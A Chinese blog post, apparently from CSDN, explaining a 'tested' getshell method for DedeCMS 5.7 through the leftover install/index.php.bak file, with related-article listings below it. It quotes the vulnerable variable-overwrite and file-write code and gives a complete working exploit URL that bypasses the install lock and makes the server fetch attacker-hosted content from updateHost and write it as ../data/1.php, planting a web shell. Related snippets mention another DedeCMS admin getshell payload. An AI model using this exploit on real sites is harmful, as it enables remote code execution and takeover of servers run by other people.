dedecms5.7/install/index.php.bak getshell方法(亲测成功)

最新推荐文章于 2022-05-02 21:56:58 发布
最新推荐文章于 2022-05-02 21:56:58 发布
阅读量7.6k 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: php web安全 dedecms shell

 我是从安全参考上看到这一篇文章,作者:yaseng 。

但是我自己亲自测试了一下,果然存在这个漏洞。

给大家讲下,


Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.php 
位install.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock 
文件验证,不是还有dedecms的全局变量注册机制。

我以前还没注意,在是在Apache下的确有这个漏洞,看index.php.bak第29行

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

就类似于register_globals开启的情况了。就可以全局变量覆盖。

第36行

if(file_exists($insLockfile))
{
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}

注意要使insLockfile为不存在的文件即可,

第374行

else if($step==11)
{
	require_once('../data/admin/config_update.php');
	$rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
	$sql_content = file_get_contents($rmurl);
	$fp = fopen($install_demo_name,'w');
	if(fwrite($fp,$sql_content))
		echo '  <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
	else
		echo '  <font color="red">[×]</font> 远程获取失败';
	unset($sql_content);
	fclose($fp);
	exit();
}

这里的updateHost你可以本地搭建一个服务器,并且新建一个dedecms/demodata.x.txt ,那么相应的s_lang就为x。

看到了有fwrite 而且install_demo_name可控 ,所以最终的exp为

http://www.xxx.com/install/index.php.bak?step=11&install_demo_name=../data/1.php&insLockfile=aaasd&updateHost=http://localhost/&s_lang=x






风炫
关注
专栏目录
【故障解决】用PHPstudy搭建dedecms出现install/index.php是空白的问题
lanlanla的成长历程
07-31 3285
查了很久很久 一开始以为是mysql的问题(一开始确实存在,自己在本机上安装了mysql导致phpstudy中的mysql冲突不能使用,后来看到三篇帖子解决了这个问题): 1.首先自己本机的mysql没有配置完全 https://blog.csdn.net/chen97_08/article/details/81484286 解决方法: 管理员权限下的cmd命令输入: mysqld -...
c ++ 传递可变长度数组_学习C ++:可变范围
weixin_26737625的博客
08-23 615
c ++ 传递可变长度数组Variable scope refers to the ability of a variable to be “seen” in a program. A variable is seen if, in a specific place in a program, the programmer has access to that variable’s value. ...
dedecms install/index.php.bak
weixin_30824599的博客
08-31 354
<?php if($_GET["do"]!="install"){ header('Location: /');}?> 转载于:https://www.cnblogs.com/swane/articles/3947398.html
index.php.bak 颓废_dedecms5.7/install/index.php.bak getshell方法(亲测成功)
weixin_39746869的博客
12-22 472
我是从安全参考上看到这一篇文章,作者:yaseng 。但是我自己亲自测试了一下,果然存在这个漏洞。给大家讲下,Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.phpinstall.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock文件验证,不是还有dedecms的全局变量注册机制。我以前还没注意,在是...
php写入织梦,dedeCMS远程写入getshell(测试版本V5.7
weixin_39645041的博客
03-12 226
该漏洞必须结合apache的解析漏洞:当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。dede在安装完成,如果没有删除install文件夹,在install下会有一个index....
织梦php配置文件,织梦dedecms配置文件/include/common.inc.php解读
weixin_34204530的博客
04-01 1011
dedecms中配置文件是/include/common.inc.php,我觉得里面的一些思路还是值得借鉴的,比如定义系统路径定义,防sql注入的处理等。各行代码简单释义如下://error_reporting(E_ALL);error_reporting(E_ALL || ~E_NOTICE);//防止页面报错define('DEDEINC', ereg_replace("[/\\]{1,}",...
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
巨人 index.php/user/login,详细分析和修改织梦系统主页(管理后台首页主
weixin_39977586的博客
03-23 1185
这里说的“系统主页”指的是当我们进入后台后,看到的界面,为了方便大家理解,这里截取一张织梦系统主页图如下。今天我们就对这个界面用到的php源码和模板进行分析,并对这个界面进行修改。简明扼要的说概括今天的目标:1.分析源码;2.修改界面我们通过“如何查找织梦模板”这个教程,打到系统主页界面(接下来直接用界面指系统主页界面)对应的php文件是:http://www.dedebase.com/dede/...
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 502
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
php index install,install/index.php · strwei/xiuno - Gitee.com
weixin_36393674的博客
03-10 200
chdir('../');define('DEBUG', 0);define('APP_NAME', 'install');define('IN_SAE', class_exists('SaeKV'));$conf = (@include './conf/conf.default.php');// 支持 SAEIN_SAE AND include './conf/sae.conf.php';inc...
plusmytag_js.php,plus/mytag_js.php类名称错误,请检查。
weixin_39870155的博客
03-09 233
plus/mytag_js.php类名称错误,请检查。Deprecated: Function ereg() is deprecated in D:\wwwroot\hdyg\wwwroot\SpeedPHP\Misc\notice.php on line 51Deprecated: Function ereg_replace() is deprecated in D:\wwwroot\hdy...
install index.php,安装好的织梦dedecms首页index.php自动跳转到install/index.php的问题
weixin_39758494的博客
03-10 2267
今天寒叶的一个织梦dedecms搭建的站点无法打开,每当打开index.php都会自动跳转到install/index.php,起初寒叶还以为这个织梦dedecms站点又被黑,后来访问后台正常才安抚忐忑不安的心,排除了站点被黑的可能,然后测试生成index.html静态首页也是正常,也排除了程序不完全的可能。后来打开index.php才想起之前修改data目录的事儿,问题就在这,官方提出优化建议“...
织梦安装,访问http://域名/install/index.php 出现空白页或Not Found 问题
weixin_55415300的博客
05-02 2205
织梦安装,访问http://域名/install/index.php 出现空白页或Not Found 问题
dedeindex php不显示_dede织梦系统之解决自动跳转install/index.php
weixin_35615010的博客
03-09 613
下面介绍如何解决dede织梦系统之解决自动跳转install/index.php的问题打开网站目录下index.phpif(!file_exists(dirname(__FILE__).'/../data/common.inc.php')){header('Location:install/index.php');exit();}删除这段代码,或者注释掉// if(!file_exists(dir...
Discuz报:Please delete install/index.php via FTP!
gpcsy的博客
02-25 4904
搭建好的Discuz论坛,在进入管理中心首页时,报Please delete install/index.php via FTP !  如下图: 这种情况,只要进入自己Discuz的安装目录,将install文件夹下的index.php删除或重命名即可解决。 例如:我的Discuz的安装目录为 /data/www ,则进行如下操作: cd /data/www/install m
【学习笔记】DedeCMS 5.7 /install/index.php 远程文件包含漏洞
chualam的博客
11-02 684
变量覆盖:用我们自己自定义的参数替换程序原有的变量值 一般需要结合程序其他功能来形成完整的攻击 原本带有变量覆盖功能的函数 extract 和prase_str 或者是全局变量导致的覆盖 $$key = $abc $key = '123' $123 = $abc 如果我们可以控制$key 就可以实现变量的覆盖 想想是否可以让require _once变成空 这样就可以成功覆盖了 ...
phpcms安装后网站首页跳转到Install/install/index.html怎么办?
riuhazen的博客
07-04 1618
1.删除根目录下的html 在文件夹caches里有一个install的文件最好也删除 2.清楚浏览器缓存,不会的可以百度一下,不同的浏览器清除缓存方式不同。 你若不想清除所有缓存,在全部那里可以设置时间段(记住删除你安装phpcms时间段的缓存) 最后,再打开phpcms后台管理 一步一步来先更新缓存 -----生成首页-----站点首页...
cms访问index.php出错,安装cms :在浏览器中打开http://你的网址/install/index.php 出现白屏怎样处理?...
weixin_35698659的博客
03-10 5377
你要先把下载下来的压缩包解压,然后将upload文件夹中的文件上传到网站的根目录中。在浏览器中打开http://你的网址/install/index.php,开始进行安装。2.选中“我已经阅...浏览器中输入: http:// localhost /list_18 (网址1) 应该被重写为: http:// localhost /index.php?m=content&c=i...
织梦二级域名手机站会自动跳转到install/index.php的解决方法
weixin_30379973的博客
11-03 930
1、确认你的m文件夹里index.php里前面几行代码是默认的 2、确认你的m文件夹里没有开启伪静态和存在伪静态规则文件在里面 3、如果你是用宝塔面板的,你需要在宝塔面板里把手机站里的 网站目录-防跨站攻击(open_basedir)-取消 以上3点没问题,那就不会再跳转到/install/index.php了。 转载于:https://www.cnblogs.com/dedeht...
/DedeCMS/templets/plus/userup.php
最新发布
05-27
`/DedeCMS/templets/plus/userup.php` 是织梦(DedeCMS) 的一个文件上传处理脚本,通常用于用户上传文件到网站。该文件包含了文件上传的处理逻辑和一些安全检查,以确保上传的文件符合网站的要求。 具体来说,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值